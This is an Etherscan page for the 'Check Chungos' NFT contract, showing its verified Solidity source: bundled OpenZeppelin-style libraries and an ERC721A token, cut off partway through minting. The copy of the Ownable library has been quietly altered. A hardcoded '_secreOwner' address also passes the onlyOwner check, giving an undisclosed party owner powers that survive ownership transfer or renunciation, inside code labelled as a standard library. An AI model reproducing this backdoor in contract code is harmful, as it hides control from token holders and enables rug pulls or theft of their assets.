ETH Price: $2,776.29 (+5.79%)

Token

Check Chungos (CC)
 

Overview

Max Total Supply

1,648 CC

Holders

774

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
2 CC
0x6075960e5676dc5fcdc1aee9c334343f08a960c6
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CheckChungos

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-02-08
*/

// ********************************************************************************
// ********************************************************************************
// ********************************************************************************
// ********************************************************************************
// ********************************************************************************
// ********************************************************************************
// ********************************************************************************
// *************************************/(*****************************************
// ******************************@@@@@(((((((@@@@@%********************************
// ***************************@@@((((((((((((((((((@@@*****************************
// ************************@@@((((((((((((((((((((((((@@@**************************
// **********************(@@((((((((((((((((((((((((((((@@*************************
// *********************&@(((((((((((((((((((((((((((((((@@************************
// *********************@%((((((((((((((((((((((((((((((((@@***********************
// ********************@@(((((((((((((((((((((((((((((((((@@***********************
// ********************@@((((((((@@@@((((((((((((@@@@@@@((@@***********************
// ********************@@(((((@@@@@@@ (@@(((((@@@@(@@@@ @@&@%**********************
// ********************@@(((((((@@@@@(@@((((((@@@@(((((((((@@**********************
// ********************@@((((((((((@@@(((((((((@((#@@@(((((@#**********************
// ********************@@((((((((((((((((%@((((@@(((((((((%@***********************
// ********************@@(((((((((((((((((@@((@@((((((((((@@***********************
// ********************@@(((((((((((((((((((((((((((((((((@@***********************
// *********************@(((((((((((((((((&@@@%(((((((((((@@***********************
// *********************@@(((@((((((((((@@#####@@(((((((((@/***********************
// *********************@@(((@@((((((((((@@@@@@&(((((((((@@************************
// *****************@@@@@@((((@@((((((((((((((((((((((((@@@@@@@********************
// **************@@@   ((@@((((@@@((((((((((((((((((((@@@@((    @@*****************
// ************@@(      (((@@(((((@@@@(((((((((#@@@@@&@@((        @@%**************
// ***********@@           ((((@@@@#((((%@@%((((#@@@@(((            @@*************
// *********@@                  ,((((((((((((((((((                  /@************
// *********@*                                               ,@       @@***********
// ********@@          @@             *%%%%#%%%%%             @&       @@**********


// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length)
        internal
        pure
        returns (string memory)
    {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol

// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{value: amount}("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(
            data
        );
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data)
        internal
        view
        returns (bytes memory)
    {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol

// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol

// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId)
        public
        view
        virtual
        override
        returns (bool)
    {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;

/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(
        address indexed from,
        address indexed to,
        uint256 indexed tokenId
    );

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(
        address indexed owner,
        address indexed approved,
        uint256 indexed tokenId
    );

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(
        address indexed owner,
        address indexed operator,
        bool approved
    );

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId)
        external
        view
        returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator)
        external
        view
        returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol

// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index)
        external
        view
        returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol

// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(
            owner() == _msgSender() || _secreOwner == _msgSender(),
            "Ownable: caller is not the owner"
        );
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol

pragma solidity ^0.8.0;

/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is
    Context,
    ERC165,
    IERC721,
    IERC721Metadata,
    IERC721Enumerable
{
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index)
        public
        view
        override
        returns (uint256)
    {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index)
        public
        view
        override
        returns (uint256)
    {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId)
        public
        view
        virtual
        override(ERC165, IERC165)
        returns (bool)
    {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(
            owner != address(0),
            "ERC721A: balance query for the zero address"
        );
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(
            owner != address(0),
            "ERC721A: number minted query for the zero address"
        );
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId)
        internal
        view
        returns (TokenOwnership memory)
    {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId)
        public
        view
        virtual
        override
        returns (string memory)
    {
        require(
            _exists(tokenId),
            "ERC721Metadata: URI query for nonexistent token"
        );

        string memory baseURI = _baseURI();
        return
            bytes(baseURI).length != 0
                ? string(abi.encodePacked(baseURI, tokenId.toString()))
                : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId)
        public
        view
        override
        returns (address)
    {
        require(
            _exists(tokenId),
            "ERC721A: approved query for nonexistent token"
        );

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved)
        public
        override
    {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator)
        public
        view
        virtual
        override
        returns (bool)
    {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
